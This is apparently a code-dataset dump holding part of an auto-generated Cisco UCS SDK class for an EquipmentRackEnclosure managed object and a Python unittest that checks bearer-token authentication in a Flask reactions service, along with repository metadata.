"part_number": MoPropertyMeta("part_number", "partNumber", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"presence": MoPropertyMeta("presence", "presence", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["empty", "equipped", "equipped-deprecated", "equipped-disc-error", "equipped-disc-in-progress", "equipped-disc-not-started", "equipped-disc-unknown", "equipped-identity-unestablishable", "equipped-not-primary", "equipped-slave", "equipped-unsupported", "equipped-with-malformed-fru", "inaccessible", "mismatch", "mismatch-identity-unestablishable", "mismatch-slave", "missing", "missing-slave", "not-supported", "unauthorized", "unknown"], []),
"revision": MoPropertyMeta("revision", "revision", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"serial": MoPropertyMeta("serial", "serial", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version401a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"vid": MoPropertyMeta("vid", "vid", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
}
prop_map = {
"assetTag": "asset_tag",
"childAction": "child_action",
"dn": "dn",
"fltAggr": "flt_aggr",
"id": "id",
"mfgTime": "mfg_time",
"model": "model",
"operQualifierReason": "oper_qualifier_reason",
"operability": "operability",
"partNumber": "part_number",
"presence": "presence",
"revision": "revision",
"rn": "rn",
"sacl": "sacl",
"serial": "serial",
"status": "status",
"vendor": "vendor",
"vid": "vid",
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.asset_tag = None
self.child_action = None
self.flt_aggr = None
self.mfg_time = None
self.model = None
self.oper_qualifier_reason = None
self.operability = None
self.part_number = None
self.presence = None
self.revision = None
self.sacl = None
self.serial = None
self.status = None
self.vendor = None
self.vid = None
ManagedObject.__init__(self, "EquipmentRackEnclosure", parent_mo_or_dn, **kwargs)
| true | true |
f7193f652b00cfdbac8c192602a1299716aac80a | 1,690 | py | Python | service/tests/test_auth.py | SWE-AGGERS/reactions_service | eb8e4bcb9f9e69c03a89da82f3c71a3454fc285c | [
"MIT"
] | null | null | null | service/tests/test_auth.py | SWE-AGGERS/reactions_service | eb8e4bcb9f9e69c03a89da82f3c71a3454fc285c | [
"MIT"
] | null | null | null | service/tests/test_auth.py | SWE-AGGERS/reactions_service | eb8e4bcb9f9e69c03a89da82f3c71a3454fc285c | [
"MIT"
] | null | null | null | import json
import unittest
import mock
from service.app import create_app
from service.auth import encode_auth_token
from service.database import empty_db
class TestAuth(unittest.TestCase):
def test0(self):
user_id = 1
# create token
new_token = encode_auth_token(user_id)
_app = create_app(debug=True)
empty_db(_app)
with _app.test_client() as client:
with mock.patch('service.views.reactions.exist_story') as exist_story_mock:
exist_story_mock.return_value = True
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + new_token})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Reaction created!')
self.assertEqual(int(body['story_id']), 1)
# wrong token
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + 'a'})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Provide a valid auth token!')
self.assertEqual(int(body['story_id']), 1)
# wrong token: 'Bearer token malformed!'
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'a'})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Bearer token malformed!')
self.assertEqual(int(body['story_id']), 1)
| 40.238095 | 105 | 0.586391 | import json
import unittest
import mock
from service.app import create_app
from service.auth import encode_auth_token
from service.database import empty_db
class TestAuth(unittest.TestCase):
def test0(self):
user_id = 1
new_token = encode_auth_token(user_id)
_app = create_app(debug=True)
empty_db(_app)
with _app.test_client() as client:
with mock.patch('service.views.reactions.exist_story') as exist_story_mock:
exist_story_mock.return_value = True
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + new_token})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Reaction created!')
self.assertEqual(int(body['story_id']), 1)
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'Bearer ' + 'a'})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Provide a valid auth token!')
self.assertEqual(int(body['story_id']), 1)
reply = client.post('/reactions/1/1/1', headers={'Authorization': 'a'})
body = json.loads(str(reply.data, 'utf8'))
self.assertEqual(int(body['reaction']), 1)
self.assertEqual(body['reply'], 'Bearer token malformed!')
self.assertEqual(int(body['story_id']), 1)
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.